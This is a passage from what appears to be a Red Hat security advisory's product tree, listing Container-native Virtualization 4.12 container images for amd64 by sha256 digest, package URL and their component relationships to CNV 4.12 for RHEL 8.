"product_version", name: "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", product: { name: "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", product_id: "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", product: { name: "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", product_id: "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", product_identification_helper: { purl: "pkg:oci/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-api&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", product: { name: "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", product_id: "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", product_identification_helper: { purl: "pkg:oci/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", product: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", product_id: "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", product: { name: "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", product_id: "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", product: { name: "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", product_id: "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", product: { name: "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", product_id: "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", product: { name: "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", product_id: "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", product_id: "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy&tag=v4.12.0-71", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", product_id: "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", product: { name: "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", product_id: "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", product_identification_helper: { purl: "pkg:oci/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-controller&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", product: { name: "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", product_id: "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", product_identification_helper: { purl: "pkg:oci/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-exportproxy&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", product: { name: "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", product_id: "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", product_identification_helper: { purl: "pkg:oci/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-exportserver&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", product: { name: "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", product_id: "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", product_identification_helper: { purl: "pkg:oci/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-handler&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", product: { name: "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", product_id: "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", product_identification_helper: { purl: "pkg:oci/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virtio-win&tag=v4.12.0-10", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", product: { name: "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", product_id: "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", product_identification_helper: { purl: "pkg:oci/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-launcher&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", product: { name: "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", product_id: "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", product_identification_helper: { purl: "pkg:oci/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-operator&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", product: { name: "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", product_id: "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", product_identification_helper: { purl: "pkg:oci/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-network-latency-checkup&tag=v4.12.0-89", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", }, product_reference: "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", }, product_reference: "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", }, product_reference: "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", }, product_reference: "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", }, product_reference: "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", }, product_reference: "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", }, product_reference: "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", }, product_reference: "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", }, product_reference: "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", }, product_reference: "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", }, product_reference: "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", }, product_reference: "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", }, product_reference: "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64 as a component of CNV 4.12 for RHEL 8", product_id: 